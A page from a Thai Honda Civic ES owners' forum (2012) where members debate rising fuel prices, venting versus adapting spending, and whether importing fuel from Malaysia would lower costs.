บ้านผมมีรถ 6 คัน ซื้อสดป้ายแดงทุกคัน มีแต่ผมอ่ะซื้อมือ2 เพราะชอบ ES แต่ก็จ่ายเงินสด ผมยังคิดว่าน้ำมันมันแพงเลย แต่ผมก็เติม 95 ทุกครั้งที่เจอปั้มไหนมี ถ้าผมเข้า Shell ผมก็เติม V Power ด้วยซ้ำ แต่ขอบ่นเหอะ น้ำมัน มันแพงจริงๆ ถึงจะมีปัญญาเติมก็เหอะ แต่มันก็แพงอะ จะบ่น ทำไม มีไรมะ?

ไม่ได้บอกให้ขายรถปั่นจักรยาน แต่บอกมา สามครั้งแล้วว่า
เปลี่ยนวิธีคิด ชีวิตก็เปลี่ยน
น้ำมันแพง ถ้าเติมได้ก็เติม ถ้าเติมไม่ได้ เราก็คิดวิธีที่ให้ประหยัดลงสิ
ตรงไหนของกระทู้ที่บอกให้ขายรถไปซื้อจักยาน แค่บอกว่า
ปรับตัวปรับรายจ่าย ตามค่าเงินในกระเป๋าที่มันลดลง
ถูกไหม พลังงนทางเลือกเหรอ ถ้าคุณไม่พร้อมที่จะจ่าย 4x.xx คุณก็หันไปใช้พลังงานทางเลือก
หรือ เลือกที่จะใช้ หรือไม่ใช้รถถ้ามันไม่คุ้มกับการที่ล้อหมุน ถ้าล้อหมุนแล้วมีรายได้พอที่จะหมุน ถูกไหม
เราน่าจะมาพูดมาดูกันว่า มีวิธีไหนที่จะทำให้ปรับตัว ปรับรายจ่ายให้เข้ากับค่าพลังงาน ถูกไหม
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 23 มีนา 2012 13:21 - อะไรจะขนาดนั้นครับ
บางทีการเสนอแนะ หรือ การแสดงออกซึ่งความเห็นส่วนตัว

ขอให้ทุกคน..ลองใตร่ตรองสักนิด ก่อนกด..ส่ง
อย่าใช้อารมณ์ในการตอบหรือเสนอแนะในลักษณะเฉือดเฉือน

ขอให้ทุกคน..ลองใจเย็นสักนิดว่า...เรากำลังเสนอแนะ หรือ แสดงออกให้กับเพื่อนของเราอ่านอยู่

ทุกสิ่งอย่าง..เป็นประโยชน์และเปิดโลกทัศน์ใหม่ๆ แต่อยู่ที่ว่า จะนำเสนอมันออกมาเช่นไร

ทำใจร่มๆกันนิดนึงนะ เพื่อนๆทุกคน

แก้ไขล่าสุดโดย เมื่อ ศุกร์, 23 มีนา 2012 13:21, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: cisco  AofStaR  kaisuh  jo_jonatan  Phetcharat  kim_possible  TidTlE  prodrive  K.panu  yenjai  lordpark  musashi44  Sombutsiri  Lee_ES_turbo  Edan  khing_cr  OiShIz  kai_es  tiktok  battery3k  hacker  K_series  chang167  ToR79 
tokykung

ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ศุกร์, 23 มีนา 2012 13:21 - อะไรจะขนาดนั้นครับ
บ่นบ้าง อะไรบ้าง..เนาะ ๆ ....แต่เปลี่ยวิธีคิด...วิธีทำก็น่าจะดีขึ้นนะครับ....^^
Zenkii

ชื่อเล่น: มี่

เข้าร่วม: 21 ธันวา 2010
ตอบ: 403

ได้รับคำขอบคุณ: 586
ให้คำขอบคุณ: 922

ที่อยู่: ดอนเมือง หมู่บ้านศิริสุข หลักสี่ แจ้งวัฒนะ ถนนวิภาวดีรังสิต รังสิต Wash United Donmueang
ศุกร์, 23 มีนา 2012 13:26 - อะไรจะขนาดนั้นครับ
Zenkii พิมพ์ว่า:

ไม่ได้บอกให้ขายรถปั่นจักรยาน แต่บอกมา สามครั้งแล้วว่า
เปลี่ยนวิธีคิด ชีวิตก็เปลี่ยน
น้ำมันแพง ถ้าเติมได้ก็เติม ถ้าเติมไม่ได้ เราก็คิดวิธีที่ให้ประหยัดลงสิ
ตรงไหนของกระทู้ที่บอกให้ขายรถไปซื้อจักยาน แค่บอกว่า
ปรับตัวปรับรายจ่าย ตามค่าเงินในกระเป๋าที่มันลดลง
ถูกไหม พลังงนทางเลือกเหรอ ถ้าคุณไม่พร้อมที่จะจ่าย 4x.xx คุณก็หันไปใช้พลังงานทางเลือก
หรือ เลือกที่จะใช้ หรือไม่ใช้รถถ้ามันไม่คุ้มกับการที่ล้อหมุน ถ้าล้อหมุนแล้วมีรายได้พอที่จะหมุน ถูกไหม
เราน่าจะมาพูดมาดูกันว่า มีวิธีไหนที่จะทำให้ปรับตัว ปรับรายจ่ายให้เข้ากับค่าพลังงาน ถูกไหม

บางคนอ่ะ เค้าก็ไม่ได้คิดอะไรเรื่องน้ำมันแพงแล้วเค้าก็มีปัญญาเติมตามปกติถูกไหม?
แล้วที่เค้าบ่นก็เพราะเค้าอยากบ่นไม่ใช่ว่าไม่อยากเติมแต่อยากบ่นเพื่อเป็นการระบาย ถูกไหม?
แล้วไปบอกเค้าเป็นทางอ้อมว่า ถ้าไม่อยากใช้น้ำมันแพงก็ไปทำอย่างอื่น หรือไปใช้ทางเลือกอื่น แล้วอย่ามาบ่น มันถูกไหม?
เคยเห็นพ่อแม่บ่นมั้ยในชีวิตประจำวัน เคยไปบอกพ่อไปมั้ยว่า ก็ปรับตัวให้เค้ากับหนูสิ ไปใช้ทางเลือกอื่นที่หนูชอบ พ่อกับแม่จะได้ไม่ต้องบ่นหนู เคยมั้ย? ถูกไหม?
ได้รับคำขอบคุณจาก: kaisuh  puyzaaaaa  jo_jonatan  kim_possible  K.panu  tun221  Edan  yorkydog  hacker  gahn27  chang167  Upper 
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 13:28 - อะไรจะขนาดนั้นครับ
~ สเตฟาน ~ พิมพ์ว่า:
บางทีการเสนอแนะ หรือ การแสดงออกซึ่งความเห็นส่วนตัว

ขอให้ทุกคน..ลองใตร่ตรองสักนิด ก่อนกด..ส่ง
อย่าใช้อารมณ์ในการตอบหรือเสนอแนะในลักษณะเฉือดเฉือน

ขอให้ทุกคน..ลองใจเย็นสักนิดว่า...เรากำลังเสนอแนะ หรือ แสดงออกให้กับเพื่อนของเราอ่านอยู่

ทุกสิ่งอย่าง..เป็นประโยชน์และเปิดโลกทัศน์ใหม่ๆ แต่อยู่ที่ว่า จะนำเสนอมันออกมาเช่นไร

ทำใจร่มๆกันนิดนึงนะ เพื่อนๆทุกคน

รับทราบค่ะ ขอโทษ ทุกคนที่แรงไปหน่อย
แต่เราก็น่าจะเสนอแนะ วิธีใช้กันสักหน่อย ( หรือเปล่า )
ว่าแต่ละคนมีแนวคิดปรับตัวกันอย่างไร กับสิ่งที่เรียกว่า "น้ำมันแพง" หรือว่าไงคะ
nilkung

ชื่อเล่น: นิล

เข้าร่วม: 21 กุมภา 2010
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1466
ให้คำขอบคุณ: 1317

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
ศุกร์, 23 มีนา 2012 13:29 - อะไรจะขนาดนั้นครับ
~ สเตฟาน ~ พิมพ์ว่า:

เบี่ยงเบนประเด็นนิดนึงครับ เนื่องจากตัวผมก็ไม่ได้มีความเชี่ยวชาญด้านเศรฐกิจ และเป็นกลางทางการเมือง ผมอยากถามแบบเด็กน้อยเลยครับว่า ถ้าเรานำเข้าน้ำมันสำเร็จรูปเลยจากมาเลย์ แล้ว+ภาษีไปนิดหน่อย จะสามารถทำให้เราขายถูกกว่านี้ได้หรือไม่ครับ เพราะเห็นข่าวลักลอบนำน้ำมันจากมาเลย์เข้ามาขายกันเยอะ
ได้รับคำขอบคุณจาก: kaisuh  Phetcharat 
ตอบ
หน้า 2 จาก 6
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.